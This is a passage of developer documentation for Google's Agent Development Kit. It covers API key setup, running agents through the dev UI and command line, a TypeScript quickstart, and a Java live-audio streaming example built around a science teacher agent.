"); String userInput = scanner.nextLine(); if ("quit".equalsIgnoreCase(userInput)) { break; } Content userMsg = Content.fromParts(Part.fromText(userInput)); Flowable events = runner.runAsync(USER_ID, session.id(), userMsg); System.out.print("\nAgent > "); events.blockingForEach(event -> System.out.println(event.stringifyContent())); } } } } ``` ## 3. Set up the model Your agent's ability to understand user requests and generate responses is powered by a Large Language Model (LLM). Your agent needs to make secure calls to this external LLM service, which **requires authentication credentials**. Without valid authentication, the LLM service will deny the agent's requests, and the agent will be unable to function. Model Authentication guide For a detailed guide on authenticating to different models, see the [Authentication guide](/adk-docs/agents/models/google-gemini#google-ai-studio). This is a critical step to ensure your agent can make calls to the LLM service. 1. Get an API key from [Google AI Studio](https://aistudio.google.com/apikey). 1. When using Python, open the **`.env`** file located inside (`multi_tool_agent/`) and copy-paste the following code. multi_tool_agent/.env ```text GOOGLE_GENAI_USE_VERTEXAI=FALSE GOOGLE_API_KEY=PASTE_YOUR_ACTUAL_API_KEY_HERE ``` When using Java, define environment variables: terminal ```console export GOOGLE_GENAI_USE_VERTEXAI=FALSE export GOOGLE_API_KEY=PASTE_YOUR_ACTUAL_API_KEY_HERE ``` When using TypeScript, the `.env` file is automatically loaded by the `import 'dotenv/config';` line at the top of your `agent.ts` file. `env title=""multi_tool_agent/.env" GOOGLE_GENAI_USE_VERTEXAI=FALSE GOOGLE_GENAI_API_KEY=PASTE_YOUR_ACTUAL_API_KEY_HERE` 1. Replace `PASTE_YOUR_ACTUAL_API_KEY_HERE` with your actual `API KEY`. 1. 
Set up a [Google Cloud project](https://cloud.google.com/vertex-ai/generative-ai/docs/start/quickstarts/quickstart-multimodal#setup-gcp) and [enable the Vertex AI API](https://console.cloud.google.com/flows/enableapi?apiid=aiplatform.googleapis.com).

1. Set up the [gcloud CLI](https://cloud.google.com/vertex-ai/generative-ai/docs/start/quickstarts/quickstart-multimodal#setup-local).

1. Authenticate to Google Cloud from the terminal by running `gcloud auth application-default login`.

1. When using Python, open the **`.env`** file located inside `multi_tool_agent/`. Copy-paste the following code and update the project ID and location.

    multi_tool_agent/.env

    ```text
    GOOGLE_GENAI_USE_VERTEXAI=TRUE
    GOOGLE_CLOUD_PROJECT=YOUR_PROJECT_ID
    GOOGLE_CLOUD_LOCATION=LOCATION
    ```

    When using Java, define environment variables:

    terminal

    ```console
    export GOOGLE_GENAI_USE_VERTEXAI=TRUE
    export GOOGLE_CLOUD_PROJECT=YOUR_PROJECT_ID
    export GOOGLE_CLOUD_LOCATION=LOCATION
    ```

    When using TypeScript, the `.env` file is automatically loaded by the `import 'dotenv/config';` line at the top of your `agent.ts` file.

    .env

    ```text
    GOOGLE_GENAI_USE_VERTEXAI=TRUE
    GOOGLE_CLOUD_PROJECT=YOUR_PROJECT_ID
    GOOGLE_CLOUD_LOCATION=LOCATION
    ```

**Vertex AI Express Mode**

1. You can sign up for a free Google Cloud project and use Gemini for free with an eligible account!

    - Set up a [Google Cloud project with Vertex AI Express Mode](https://cloud.google.com/vertex-ai/generative-ai/docs/start/express-mode/overview)
    - Get an API key from your Express mode project. This key can be used with ADK to use Gemini models for free and to access Agent Engine services.

1. When using Python, open the **`.env`** file located inside `multi_tool_agent/`. Copy-paste the following code and replace the placeholder with your Express mode API key.
multi_tool_agent/.env ```text GOOGLE_GENAI_USE_VERTEXAI=TRUE GOOGLE_API_KEY=PASTE_YOUR_ACTUAL_EXPRESS_MODE_API_KEY_HERE ``` When using Java, define environment variables: terminal ```console export GOOGLE_GENAI_USE_VERTEXAI=TRUE export GOOGLE_API_KEY=PASTE_YOUR_ACTUAL_EXPRESS_MODE_API_KEY_HERE ``` When using TypeScript, the `.env` file is automatically loaded by the `import 'dotenv/config';` line at the top of your `agent.ts` file. .env ```text GOOGLE_GENAI_USE_VERTEXAI=TRUE GOOGLE_GENAI_API_KEY=PASTE_YOUR_ACTUAL_EXPRESS_MODE_API_KEY_HERE ``` ## 4. Run Your Agent Using the terminal, navigate to the parent directory of your agent project (e.g. using `cd ..`): ```console parent_folder/ <-- navigate to this directory multi_tool_agent/ __init__.py agent.py .env ``` There are multiple ways to interact with your agent: Authentication Setup for Vertex AI Users If you selected **"Gemini - Google Cloud Vertex AI"** in the previous step, you must authenticate with Google Cloud before launching the dev UI. Run this command and follow the prompts: ```bash gcloud auth application-default login ``` **Note:** Skip this step if you're using "Gemini - Google AI Studio". Run the following command to launch the **dev UI**. ```shell adk web ``` Caution: ADK Web for development only ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only. Note for Windows users When hitting the `_make_subprocess_transport NotImplementedError`, consider using `adk web --no-reload` instead. **Step 1:** Open the URL provided (usually `http://localhost:8000` or `http://127.0.0.1:8000`) directly in your browser. **Step 2.** In the top-left corner of the UI, you can select your agent in the dropdown. Select "multi_tool_agent". Troubleshooting If you do not see "multi_tool_agent" in the dropdown menu, make sure you are running `adk web` in the **parent folder** of your agent folder (i.e. the parent folder of multi_tool_agent). 
**Step 3.** Now you can chat with your agent using the textbox.

**Step 4.** By using the `Events` tab at the left, you can inspect individual function calls, responses, and model responses by clicking on the actions.

On the `Events` tab, you can also click the `Trace` button to see the trace logs for each event, which show the latency of each function call.

**Step 5.** You can also enable your microphone and talk to your agent.

**Model support for voice/video streaming:** To use voice/video streaming in ADK, you need to use Gemini models that support the Live API. You can find the **model IDs** that support the Gemini Live API in the documentation:

- [Google AI Studio: Gemini Live API](https://ai.google.dev/gemini-api/docs/models#live-api)
- [Vertex AI: Gemini Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api)

You can then replace the `model` string in `root_agent` in the `agent.py` file you created earlier ([jump to section](#agentpy)). Your code should look something like:

```py
root_agent = Agent(
    name="weather_time_agent",
    model="replace-me-with-model-id",  # e.g. gemini-2.0-flash-live-001
    ...
```

**Tip:** When using `adk run`, you can inject an initial prompt into the agent by piping text to the command like so:

```shell
echo "Please start by listing files" | adk run file_listing_agent
```

Run the following command to chat with your weather agent.

```text
adk run multi_tool_agent
```

To exit, use Cmd/Ctrl+C.

`adk api_server` lets you create a local FastAPI server with a single command, so you can test local cURL requests before you deploy your agent.

To learn how to use `adk api_server` for testing, refer to the [documentation on using the API server](/adk-docs/runtime/api-server/).
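As a rough illustration of the kind of request you might send to the local server, the Python sketch below builds (but does not send) a JSON request for a `/run` endpoint. The endpoint path, the snake_case field names, the port, and the `u_123` / `s_123` IDs are assumptions made for illustration and are not specified in this guide; check the API server documentation for the exact request format, and note that a session may need to exist before a run request succeeds.

```python
import json
import urllib.request

# Assumption: the local server listens on port 8000, like the dev UI in this guide.
BASE_URL = "http://localhost:8000"


def build_run_request(app_name: str, user_id: str, session_id: str, text: str) -> urllib.request.Request:
    """Build a POST request carrying one user message (field names are assumed)."""
    payload = {
        "app_name": app_name,
        "user_id": user_id,
        "session_id": session_id,
        "new_message": {"role": "user", "parts": [{"text": text}]},
    }
    return urllib.request.Request(
        f"{BASE_URL}/run",
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


request = build_run_request(
    "multi_tool_agent", "u_123", "s_123", "What is the weather in New York?"
)
print(request.get_method(), request.full_url)
print(request.data.decode("utf-8"))

# To actually send it, start the server first and then uncomment:
# with urllib.request.urlopen(request) as response:
#     print(json.load(response))
```

Building the request separately from sending it makes it easy to inspect the payload before a server is running.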
Using the terminal, navigate to your agent project directory: ```console my-adk-agent/ <-- navigate to this directory agent.ts .env package.json tsconfig.json ``` There are multiple ways to interact with your agent: Run the following command to launch the **dev UI**. ```shell npx adk web ``` **Step 1:** Open the URL provided (usually `http://localhost:8000` or `http://127.0.0.1:8000`) directly in your browser. **Step 2.** In the top-left corner of the UI, select your agent from the dropdown. The agents are listed by their filenames, so you should select "agent". Troubleshooting If you do not see "agent" in the dropdown menu, make sure you are running `npx adk web` in the directory containing your `agent.ts` file. **Step 3.** Now you can chat with your agent using the textbox: **Step 4.** By using the `Events` tab at the left, you can inspect individual function calls, responses and model responses by clicking on the actions: On the `Events` tab, you can also click the `Trace` button to see the trace logs for each event that shows the latency of each function calls: Run the following command to chat with your agent. ```text npx adk run agent.ts ``` To exit, use Cmd/Ctrl+C. `npx adk api_server` enables you to create a local Express.js server in a single command, enabling you to test local cURL requests before you deploy your agent. To learn how to use `api_server` for testing, refer to the [documentation on testing](/adk-docs/runtime/api-server/). Using the terminal, navigate to the parent directory of your agent project (e.g. using `cd ..`): ```console project_folder/ <-- navigate to this directory ├── pom.xml (or build.gradle) ├── src/ ├── └── main/ │ └── java/ │ └── agents/ │ └── multitool/ │ └── MultiToolAgent.java └── test/ ``` Run the following command from the terminal to launch the Dev UI. 
**DO NOT change the main class name of the Dev UI server.** terminal ```console mvn exec:java \ -Dexec.mainClass="com.google.adk.web.AdkWebServer" \ -Dexec.args="--adk.agents.source-dir=src/main/java" \ -Dexec.classpathScope="compile" ``` **Step 1:** Open the URL provided (usually `http://localhost:8080` or `http://127.0.0.1:8080`) directly in your browser. **Step 2.** In the top-left corner of the UI, you can select your agent in the dropdown. Select "multi_tool_agent". Troubleshooting If you do not see "multi_tool_agent" in the dropdown menu, make sure you are running the `mvn` command at the location where your Java source code is located (usually `src/main/java`). **Step 3.** Now you can chat with your agent using the textbox: **Step 4.** You can also inspect individual function calls, responses and model responses by clicking on the actions: Caution: ADK Web for development only ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only. With Maven, run the `main()` method of your Java class with the following command: terminal ```console mvn compile exec:java -Dexec.mainClass="agents.multitool.MultiToolAgent" ``` With Gradle, the `build.gradle` or `build.gradle.kts` build file should have the following Java plugin in its `plugins` section: ```groovy plugins { id('java') // other plugins } ``` Then, elsewhere in the build file, at the top-level, create a new task to run the `main()` method of your agent: ```groovy tasks.register('runAgent', JavaExec) { classpath = sourceSets.main.runtimeClasspath mainClass = 'agents.multitool.MultiToolAgent' } ``` Finally, on the command-line, run the following command: ```console gradle runAgent ``` ### 📝 Example prompts to try - What is the weather in New York? - What is the time in New York? - What is the weather in Paris? - What is the time in Paris? ## 🎉 Congratulations! You've successfully created and interacted with your first agent using ADK! 
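The weather prompts above hit both branches of the weather tool. As a minimal plain-Python sketch that mirrors the tool logic from this guide without importing ADK (a standalone stand-in for illustration, not the ADK-wrapped tool), you can see the status dictionary the model receives in each case:

```python
def get_weather(city: str) -> dict:
    """Standalone copy of the quickstart's weather logic: only New York is known."""
    if city.lower() == "new york":
        return {
            "status": "success",
            "report": (
                "The weather in New York is sunny with a temperature of "
                "25 degrees Celsius (77 degrees Fahrenheit)."
            ),
        }
    # Any other city falls through to the error branch.
    return {
        "status": "error",
        "error_message": f"Weather information for '{city}' is not available.",
    }


for city in ("New York", "Paris"):
    result = get_weather(city)
    print(city, "->", result["status"])
```

The agent turns the error dictionary into a polite "not available" answer rather than failing. The time prompts behave similarly, although the Java sample looks city names up in the JVM's time zone IDs, so it may also answer for cities such as Paris.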
______________________________________________________________________ ## 🛣️ Next steps - **Go to the tutorial**: Learn how to add memory, session, state to your agent: [tutorial](https://google.github.io/adk-docs/tutorials/index.md). - **Delve into advanced configuration:** Explore the [setup](https://google.github.io/adk-docs/get-started/installation/index.md) section for deeper dives into project structure, configuration, and other interfaces. - **Understand Core Concepts:** Learn about [agents concepts](https://google.github.io/adk-docs/agents/index.md). # TypeScript Quickstart for ADK This guide shows you how to get up and running with Agent Development Kit for TypeScript. Before you start, make sure you have the following installed: - Node.js 24.13.0 or later - Node Package Manager (npm) 11.8.0 or later ## Create an agent project Create an empty `my-agent` directory for your project: ```text my-agent/ ``` Create this project structure using the command line ```bash mkdir -p my-agent/ ``` ```console mkdir my-agent ``` ### Configure project and dependencies Use the `npm` tool to install and configure dependencies for your project, including the package file, ADK TypeScript main library, and developer tools. Run the following commands from your `my-agent/` directory to create the `package.json` file and install the project dependencies: ```console cd my-agent/ # initialize a project as an ES module npm init --yes npm pkg set type="module" npm pkg set main="agent.ts" # install ADK libraries npm install @google/adk # install dev tools as a dev dependency npm install -D @google/adk-devtools ``` ### Define the agent code Create the code for a basic agent, including a simple implementation of an ADK [Function Tool](/adk-docs/tools/function-tools/), called `getCurrentTime`. 
Create an `agent.ts` file in your project directory and add the following code:

my-agent/agent.ts

```typescript
import {FunctionTool, LlmAgent} from '@google/adk';
import {z} from 'zod';

/* Mock tool implementation */
const getCurrentTime = new FunctionTool({
  name: 'get_current_time',
  description: 'Returns the current time in a specified city.',
  parameters: z.object({
    city: z.string().describe("The name of the city for which to retrieve the current time."),
  }),
  execute: ({city}) => {
    return {status: 'success', report: `The current time in ${city} is 10:30 AM`};
  },
});

export const rootAgent = new LlmAgent({
  name: 'hello_time_agent',
  model: 'gemini-2.5-flash',
  description: 'Tells the current time in a specified city.',
  instruction: `You are a helpful assistant that tells the current time in a city.
                Use the 'get_current_time' tool for this purpose.`,
  tools: [getCurrentTime],
});
```

### Set your API key

This project uses the Gemini API, which requires an API key. If you don't already have a Gemini API key, create one in Google AI Studio on the [API Keys](https://aistudio.google.com/app/apikey) page.

In a terminal window, write your API key into the `.env` file of your project to set the environment variable:

Update: my-agent/.env

```bash
echo 'GEMINI_API_KEY="YOUR_API_KEY"' > .env
```

**Using other AI models with ADK:** ADK supports the use of many generative AI models. For more information on configuring other models in ADK agents, see [Models & Authentication](/adk-docs/agents/models).

## Run your agent

You can run your ADK agent with the `@google/adk-devtools` library, either as an interactive command-line interface using the `run` command or in the ADK web user interface using the `web` command. Both options let you test and interact with your agent.
### Run with command-line interface Run your agent with the ADK TypeScript command-line interface tool using the following command: ```console npx adk run agent.ts ``` ### Run with web interface Run your agent with the ADK web interface using the following command: ```console npx adk web ``` This command starts a web server with a chat interface for your agent. You can access the web interface at (http://localhost:8000). Select your agent at the upper right corner and type a request. Caution: ADK Web for development only ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only. ## Next: Build your agent Now that you have ADK installed and your first agent running, try building your own agent with our build guides: - [Build your agent](/adk-docs/tutorials/) # Build a streaming agent The Agent Development Kit (ADK) enables real-time, interactive experiences with your AI agents through streaming. This allows for features like live voice conversations, real-time tool use, and continuous updates from your agent. This page provides quickstart examples to get you up and running with streaming capabilities in both Python and Java ADK. - **Python ADK: Streaming agent** ______________________________________________________________________ This example demonstrates how to set up a basic streaming interaction with an agent using Python ADK. It typically involves using the `Runner.run_live()` method and handling asynchronous events. [View Python Streaming Quickstart](https://google.github.io/adk-docs/get-started/streaming/quickstart-streaming/index.md) - **Java ADK: Streaming agent** ______________________________________________________________________ This example demonstrates how to set up a basic streaming interaction with an agent using Java ADK. It involves using the `Runner.runLive()` method, a `LiveRequestQueue`, and handling the `Flowable` stream. 
[View Java Streaming Quickstart](https://google.github.io/adk-docs/get-started/streaming/quickstart-streaming-java/index.md) # Build a streaming agent with Java This quickstart guide will walk you through the process of creating a basic agent and leveraging ADK Streaming with Java to facilitate low-latency, bidirectional voice interactions. You'll begin by setting up your Java and Maven environment, structuring your project, and defining the necessary dependencies. Following this, you'll create a simple `ScienceTeacherAgent`, test its text-based streaming capabilities using the Dev UI, and then progress to enabling live audio communication, transforming your agent into an interactive voice-driven application. ## **Create your first agent** ### **Prerequisites** - In this getting started guide, you will be programming in Java. Check if **Java** is installed on your machine. Ideally, you should be using Java 17 or more (you can check that by typing **java -version**) - You’ll also be using the **Maven** build tool for Java. So be sure to have [Maven installed](https://maven.apache.org/install.html) on your machine before going further (this is the case for Cloud Top or Cloud Shell, but not necessarily for your laptop). ### **Prepare the project structure** To get started with ADK Java, let’s create a Maven project with the following directory structure: ```text adk-agents/ ├── pom.xml └── src/ └── main/ └── java/ └── agents/ └── ScienceTeacherAgent.java ``` Follow the instructions in [Installation](https://google.github.io/adk-docs/get-started/installation/index.md) page to add `pom.xml` for using the ADK package. Note Feel free to use whichever name you like for the root directory of your project (instead of adk-agents) ### **Running a compilation** Let’s see if Maven is happy with this build, by running a compilation (**mvn compile** command): ```shell $ mvn compile [INFO] Scanning for projects... 
[INFO]
[INFO] --------------------< adk-agents:adk-agents >--------------------
[INFO] Building adk-agents 1.0-SNAPSHOT
[INFO]   from pom.xml
[INFO] --------------------------------[ jar ]---------------------------------
[INFO]
[INFO] --- resources:3.3.1:resources (default-resources) @ adk-demo ---
[INFO] skip non existing resourceDirectory /home/user/adk-demo/src/main/resources
[INFO]
[INFO] --- compiler:3.13.0:compile (default-compile) @ adk-demo ---
[INFO] Nothing to compile - all classes are up to date.
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  1.347 s
[INFO] Finished at: 2025-05-06T15:38:08Z
[INFO] ------------------------------------------------------------------------
```

Looks like the project is set up properly for compilation!

### **Creating an agent**

Create the **ScienceTeacherAgent.java** file under the `src/main/java/agents/` directory with the following content:

```java
package agents;

import com.google.adk.agents.BaseAgent;
import com.google.adk.agents.LlmAgent;

/** Science teacher agent. */
public class ScienceTeacherAgent {

  // Field expected by the Dev UI to load the agent dynamically
  // (the agent must be initialized at declaration time)
  public static final BaseAgent ROOT_AGENT = initAgent();

  // Please fill in the latest model id that supports live API from
  // https://google.github.io/adk-docs/get-started/streaming/quickstart-streaming/#supported-models
  public static BaseAgent initAgent() {
    return LlmAgent.builder()
        .name("science-app")
        .description("Science teacher agent")
        .model("...") // Please fill in the latest model id for live API
        .instruction("""
            You are a helpful science teacher that explains
            science concepts to kids and teenagers.
            """)
        .build();
  }
}
```

We will use `Dev UI` to run this agent later.
For the tool to automatically recognize the agent, its Java class has to comply with the following two rules:

- The agent should be stored in a global **public static** variable named **ROOT_AGENT** of type **BaseAgent** and initialized at declaration time.
- The agent definition has to be a **static** method so it can be loaded during the class initialization by the dynamic compiling classloader.

## **Run agent with Dev UI**

`Dev UI` is a web server where you can quickly run and test your agents during development, without building your own UI application for them.

### **Define environment variables**

To run the server, you’ll need to export two environment variables:

- a Gemini key that you can [get from AI Studio](https://ai.google.dev/gemini-api/docs/api-key),
- a variable to specify we’re not using Vertex AI this time.

```shell
export GOOGLE_GENAI_USE_VERTEXAI=FALSE
export GOOGLE_API_KEY=YOUR_API_KEY
```

### **Run Dev UI**

Run the following command from the terminal to launch the Dev UI.

terminal

```console
mvn exec:java \
    -Dexec.mainClass="com.google.adk.web.AdkWebServer" \
    -Dexec.args="--adk.agents.source-dir=." \
    -Dexec.classpathScope="compile"
```

**Step 1:** Open the URL provided (usually `http://localhost:8080` or `http://127.0.0.1:8080`) directly in your browser.

**Step 2.** In the top-left corner of the UI, you can select your agent in the dropdown. Select "science-app".

**Troubleshooting:** If you do not see "science-app" in the dropdown menu, make sure you are running the `mvn` command from the root of your Maven project.

**Caution: ADK Web for development only.** ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only.

## Try Dev UI with voice and video

In your browser, open the Dev UI at the URL from the previous step (usually `http://localhost:8080`).

Click the microphone button to enable voice input, and ask a question such as `What's the electron?` by voice.
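You will hear the answer in voice in real time.

To try with video, reload the web browser, click the camera button to enable the video input, and ask questions like "What do you see?". The agent will describe what it sees in the video input.

### Caveat

- You cannot use text chat with the native-audio models. You will see errors when entering text messages on `adk web`.

### Stop the tool

Stop the tool by pressing `Ctrl-C` on the console.

## **Run agent with a custom live audio app**

Now, let's try audio streaming with the agent and a custom live audio application.

### **A Maven pom.xml build file for Live Audio**

Replace your existing pom.xml with the following.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>

  <groupId>com.google.adk.samples</groupId>
  <artifactId>google-adk-sample-live-audio</artifactId>
  <version>0.1.0</version>
  <name>Google ADK - Sample - Live Audio</name>
  <description>
    A sample application demonstrating a live audio conversation using ADK,
    runnable via samples.liveaudio.LiveAudioRun.
  </description>
  <packaging>jar</packaging>

  <properties>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
    <java.version>17</java.version>
    <auto-value.version>1.11.0</auto-value.version>
    <exec.mainClass>samples.liveaudio.LiveAudioRun</exec.mainClass>
    <google-adk.version>0.1.0</google-adk.version>
  </properties>

  <dependencyManagement>
    <dependencies>
      <dependency>
        <groupId>com.google.cloud</groupId>
        <artifactId>libraries-bom</artifactId>
        <version>26.53.0</version>
        <type>pom</type>
        <scope>import</scope>
      </dependency>
    </dependencies>
  </dependencyManagement>

  <dependencies>
    <dependency>
      <groupId>com.google.adk</groupId>
      <artifactId>google-adk</artifactId>
      <version>${google-adk.version}</version>
    </dependency>
    <dependency>
      <groupId>commons-logging</groupId>
      <artifactId>commons-logging</artifactId>
      <version>1.2</version>
    </dependency>
  </dependencies>

  <build>
    <plugins>
      <plugin>
        <groupId>org.apache.maven.plugins</groupId>
        <artifactId>maven-compiler-plugin</artifactId>
        <version>3.13.0</version>
        <configuration>
          <source>${java.version}</source>
          <target>${java.version}</target>
          <parameters>true</parameters>
          <annotationProcessorPaths>
            <path>
              <groupId>com.google.auto.value</groupId>
              <artifactId>auto-value</artifactId>
              <version>${auto-value.version}</version>
            </path>
          </annotationProcessorPaths>
        </configuration>
      </plugin>
      <plugin>
        <groupId>org.codehaus.mojo</groupId>
        <artifactId>build-helper-maven-plugin</artifactId>
        <version>3.6.0</version>
        <executions>
          <execution>
            <id>add-source</id>
            <phase>generate-sources</phase>
            <goals>
              <goal>add-source</goal>
            </goals>
            <configuration>
              <sources>
                <source>.</source>
              </sources>
            </configuration>
          </execution>
        </executions>
      </plugin>
      <plugin>
        <groupId>org.codehaus.mojo</groupId>
        <artifactId>exec-maven-plugin</artifactId>
        <version>3.2.0</version>
        <configuration>
          <mainClass>${exec.mainClass}</mainClass>
          <classpathScope>runtime</classpathScope>
        </configuration>
      </plugin>
    </plugins>
  </build>
</project>
```

### **Creating Live Audio Run tool**

Create the **LiveAudioRun.java** file under the `src/main/java/` directory with the following content. This tool runs the agent with live audio input and output.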
```java package samples.liveaudio; import com.google.adk.agents.LiveRequestQueue; import com.google.adk.agents.RunConfig; import com.google.adk.events.Event; import com.google.adk.runner.Runner; import com.google.adk.sessions.InMemorySessionService; import com.google.common.collect.ImmutableList; import com.google.genai.types.Blob; import com.google.genai.types.Modality; import com.google.genai.types.PrebuiltVoiceConfig; import com.google.genai.types.Content; import com.google.genai.types.Part; import com.google.genai.types.SpeechConfig; import com.google.genai.types.VoiceConfig; import io.reactivex.rxjava3.core.Flowable; import java.io.ByteArrayOutputStream; import java.io.InputStream; import java.net.URL; import javax.sound.sampled.AudioFormat; import javax.sound.sampled.AudioInputStream; import javax.sound.sampled.AudioSystem; import javax.sound.sampled.DataLine; import javax.sound.sampled.LineUnavailableException; import javax.sound.sampled.Mixer; import javax.sound.sampled.SourceDataLine; import javax.sound.sampled.TargetDataLine; import java.util.UUID; import java.util.concurrent.ExecutorService; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.ConcurrentMap; import java.util.concurrent.Executors; import java.util.concurrent.Future; import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicBoolean; import agents.ScienceTeacherAgent; /** Main class to demonstrate running the {@link LiveAudioAgent} for a voice conversation. 
*/ public final class LiveAudioRun { private final String userId; private final String sessionId; private final Runner runner; private static final javax.sound.sampled.AudioFormat MIC_AUDIO_FORMAT = new javax.sound.sampled.AudioFormat(16000.0f, 16, 1, true, false); private static final javax.sound.sampled.AudioFormat SPEAKER_AUDIO_FORMAT = new javax.sound.sampled.AudioFormat(24000.0f, 16, 1, true, false); private static final int BUFFER_SIZE = 4096; public LiveAudioRun() { this.userId = "test_user"; String appName = "LiveAudioApp"; this.sessionId = UUID.randomUUID().toString(); InMemorySessionService sessionService = new InMemorySessionService(); this.runner = new Runner(ScienceTeacherAgent.ROOT_AGENT, appName, null, sessionService); ConcurrentMap initialState = new ConcurrentHashMap<>(); var unused = sessionService.createSession(appName, userId, initialState, sessionId).blockingGet(); } private void runConversation() throws Exception { System.out.println("Initializing microphone input and speaker output..."); RunConfig runConfig = RunConfig.builder() .setStreamingMode(RunConfig.StreamingMode.BIDI) .setResponseModalities(ImmutableList.of(new Modality("AUDIO"))) .setSpeechConfig( SpeechConfig.builder() .voiceConfig( VoiceConfig.builder() .prebuiltVoiceConfig( PrebuiltVoiceConfig.builder().voiceName("Aoede").build()) .build()) .languageCode("en-US") .build()) .build(); LiveRequestQueue liveRequestQueue = new LiveRequestQueue(); Flowable eventStream = this.runner.runLive( runner.sessionService().createSession(userId, sessionId).blockingGet(), liveRequestQueue, runConfig); AtomicBoolean isRunning = new AtomicBoolean(true); AtomicBoolean conversationEnded = new AtomicBoolean(false); ExecutorService executorService = Executors.newFixedThreadPool(2); // Task for capturing microphone input Future microphoneTask = executorService.submit(() -> captureAndSendMicrophoneAudio(liveRequestQueue, isRunning)); // Task for processing agent responses and playing audio Future 
    outputTask =
        executorService.submit(
            () -> {
              try {
                processAudioOutput(eventStream, isRunning, conversationEnded);
              } catch (Exception e) {
                System.err.println("Error processing audio output: " + e.getMessage());
                e.printStackTrace();
                isRunning.set(false);
              }
            });

    // Wait for user to press Enter to stop the conversation
    System.out.println("Conversation started. Press Enter to stop...");
    System.in.read();

    System.out.println("Ending conversation...");
    isRunning.set(false);

    try {
      // Give some time for ongoing processing to complete
      microphoneTask.get(2, TimeUnit.SECONDS);
      outputTask.get(2, TimeUnit.SECONDS);
    } catch (Exception e) {
      System.out.println("Stopping tasks...");
    }

    liveRequestQueue.close();
    executorService.shutdownNow();
    System.out.println("Conversation ended.");
  }

  private void captureAndSendMicrophoneAudio(
      LiveRequestQueue liveRequestQueue, AtomicBoolean isRunning) {
    TargetDataLine micLine = null;
    try {
      DataLine.Info info = new DataLine.Info(TargetDataLine.class, MIC_AUDIO_FORMAT);
      if (!AudioSystem.isLineSupported(info)) {
        System.err.println("Microphone line not supported!");
        return;
      }

      micLine = (TargetDataLine) AudioSystem.getLine(info);
      micLine.open(MIC_AUDIO_FORMAT);
      micLine.start();

      System.out.println("Microphone initialized. Start speaking...");

      byte[] buffer = new byte[BUFFER_SIZE];
      int bytesRead;

      while (isRunning.get()) {
        bytesRead = micLine.read(buffer, 0, buffer.length);

        if (bytesRead > 0) {
          byte[] audioChunk = new byte[bytesRead];
          System.arraycopy(buffer, 0, audioChunk, 0, bytesRead);

          Blob audioBlob = Blob.builder().data(audioChunk).mimeType("audio/pcm").build();
          liveRequestQueue.realtime(audioBlob);
        }
      }
    } catch (LineUnavailableException e) {
      System.err.println("Error accessing microphone: " + e.getMessage());
      e.printStackTrace();
    } finally {
      if (micLine != null) {
        micLine.stop();
        micLine.close();
      }
    }
  }

  private void processAudioOutput(
      Flowable<Event> eventStream, AtomicBoolean isRunning, AtomicBoolean conversationEnded) {
    SourceDataLine speakerLine = null;
    try {
      DataLine.Info info = new DataLine.Info(SourceDataLine.class, SPEAKER_AUDIO_FORMAT);
      if (!AudioSystem.isLineSupported(info)) {
        System.err.println("Speaker line not supported!");
        return;
      }

      final SourceDataLine finalSpeakerLine = (SourceDataLine) AudioSystem.getLine(info);
      finalSpeakerLine.open(SPEAKER_AUDIO_FORMAT);
      finalSpeakerLine.start();
      // Assign to the outer variable as soon as the line is open, so the finally
      // block can release it even if event processing fails part-way through.
      speakerLine = finalSpeakerLine;

      System.out.println("Speaker initialized.");

      for (Event event : eventStream.blockingIterable()) {
        if (!isRunning.get()) {
          break;
        }

        AtomicBoolean audioReceived = new AtomicBoolean(false);
        processEvent(event, audioReceived);

        event
            .content()
            .ifPresent(
                content ->
                    content
                        .parts()
                        .ifPresent(
                            parts ->
                                parts.forEach(part -> playAudioData(part, finalSpeakerLine))));
      }
    } catch (LineUnavailableException e) {
      System.err.println("Error accessing speaker: " + e.getMessage());
      e.printStackTrace();
    } finally {
      if (speakerLine != null) {
        speakerLine.drain();
        speakerLine.stop();
        speakerLine.close();
      }
      conversationEnded.set(true);
    }
  }

  private void playAudioData(Part part, SourceDataLine speakerLine) {
    part.inlineData()
        .ifPresent(
            inlineBlob ->
                inlineBlob
                    .data()
                    .ifPresent(
                        audioBytes -> {
                          if (audioBytes.length > 0) {
                            System.out.printf(
                                "Playing audio (%s): %d bytes%n",
                                inlineBlob.mimeType(), audioBytes.length);
                            speakerLine.write(audioBytes, 0, audioBytes.length);
                          }
                        }));
  }

  private void processEvent(Event event, AtomicBoolean audioReceived) {
    event
        .content()
        .ifPresent(
            content ->
                content
                    .parts()
                    .ifPresent(parts -> parts.forEach(part -> logReceivedAudioData(part, audioReceived))));
  }

  private void logReceivedAudioData(Part part, AtomicBoolean audioReceived) {
    part.inlineData()
        .ifPresent(
            inlineBlob ->
                inlineBlob
                    .data()
                    .ifPresent(
                        audioBytes -> {
                          if (audioBytes.length > 0) {
                            System.out.printf(
                                "    Audio (%s): received %d bytes.%n",
                                inlineBlob.mimeType(), audioBytes.length);
                            audioReceived.set(true);
                          } else {
                            System.out.printf(
                                "    Audio (%s): received empty audio data.%n",
                                inlineBlob.mimeType());
                          }
                        }));
  }

  public static void main(String[] args) throws Exception {
    LiveAudioRun liveAudioRun = new LiveAudioRun();
    liveAudioRun.runConversation();
    System.out.println("Exiting Live Audio Run.");
  }
}
```

### **Run the Live Audio Run tool**

To run the Live Audio Run tool, use the following command in the `adk-agents` directory:

```text
mvn compile exec:java
```

You should then see:

```text
$ mvn compile exec:java
...
Initializing microphone input and speaker output...
Conversation started. Press Enter to stop...
Speaker initialized.
Microphone initialized. Start speaking...
```

Once this message appears, the tool is ready to take voice input. Ask the agent a question aloud, such as `What is an electron?`.

Caution

If the agent keeps talking to itself and does not stop, try using earphones to suppress the echo.

## **Summary**

